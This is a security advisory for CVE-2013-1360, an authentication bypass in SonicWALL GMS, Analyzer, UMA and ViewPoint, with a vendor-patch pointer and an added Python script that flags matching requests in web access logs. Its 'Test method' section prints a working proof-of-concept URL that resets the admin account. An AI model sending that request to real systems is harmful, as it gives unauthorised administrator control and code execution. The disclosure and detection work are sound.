Release date:
Updated on: 2013-01-22
Affected Systems:
SonicWALL GMS/Analyzer/UMA 7.0.x
SonicWALL GMS/Analyzer/UMA 6.0.x
SonicWALL GMS/Analyzer/UMA 5.1.x
SonicWALL GMS/ViewPoint 5.0.x
SonicWALL GMS/ViewPoint 4.1.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57446
CVE (CAN) ID: CVE-2013-1360
SonicWALL provides Internet Security Solutions for small and medium-sized enterprises and distributed enterprises.
SonicWALL Global Management System (GMS), ViewPoint, Universal Management Appliance (UMA) and Analyzer contain an authentication bypass vulnerability in their implementation. By sending a specially crafted request to the SGMS interface, an attacker can exploit this vulnerability to access the web interface with administrator privileges, resulting in arbitrary code execution at the system level.
<* Source: Nikolas Sotiriu
Link: http://securitytracker.com/id/1028007
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
http://www.example.com/sgms/auth?clientHash=000083761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c90924acebb&changePassword=1&user=admin&ctlSGMSDomainId=dmn1_00000000000000001
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
SonicWALL
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.sonicwall.com
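
Detection note (an added example, not part of the original advisory or of any SonicWALL tooling): the script below scans web access logs for requests shaped like the one under Test method, that is, /sgms/auth carrying a clientHash or clientHash2 value together with changePassword. It assumes Common/Combined Log Format; the function names, sample log lines, the /sgms/login path and the placeholder hash values are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: Common/Combined Log Format access logs (for example from a
# reverse proxy in front of the appliance); adjust LOG_RE for other formats.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def query_params(target):
    """Query parameters of a request target, with lower-cased names."""
    query = urlsplit(target).query
    return {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}

def suspicious_auth_request(target):
    """True for /sgms/auth requests that carry a clientHash/clientHash2
    value together with changePassword, the shape shown under Test method."""
    if urlsplit(target).path.rstrip("/").lower() != "/sgms/auth":
        return False
    params = query_params(target)
    has_hash = "clienthash" in params or "clienthash2" in params
    return has_hash and "changepassword" in params

def scan(lines):
    """Return (ip, timestamp, status, user) for every matching log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and suspicious_auth_request(m["target"]):
            user = query_params(m["target"]).get("user", [""])[0]
            hits.append((m["ip"], m["ts"], int(m["status"]), user))
    return hits

# Constructed sample lines: documentation IP ranges, placeholder hash values.
SAMPLE = [
    '198.51.100.7 - - [22/Jan/2013:10:15:02 +0000] "GET /sgms/auth?clientHash=X'
    '&clientHash2=Y&changePassword=1&user=admin HTTP/1.1" 200 512',
    '192.0.2.10 - - [22/Jan/2013:10:16:40 +0000] "GET /sgms/login HTTP/1.1" 200 2048',
    '203.0.113.5 - - [22/Jan/2013:10:17:11 +0000] "POST /SGMS/auth?ClientHash=X'
    '&ChangePassword=1&user=admin HTTP/1.1" 302 0',
    '192.0.2.10 - - [22/Jan/2013:10:18:00 +0000] "GET /sgms/auth?user=admin HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Parameters sent in a POST body do not appear in access logs, so this check only sees requests that carry them in the URL. A hit shows that a matching request was made, not that it succeeded; review the account named in the user field on the affected system.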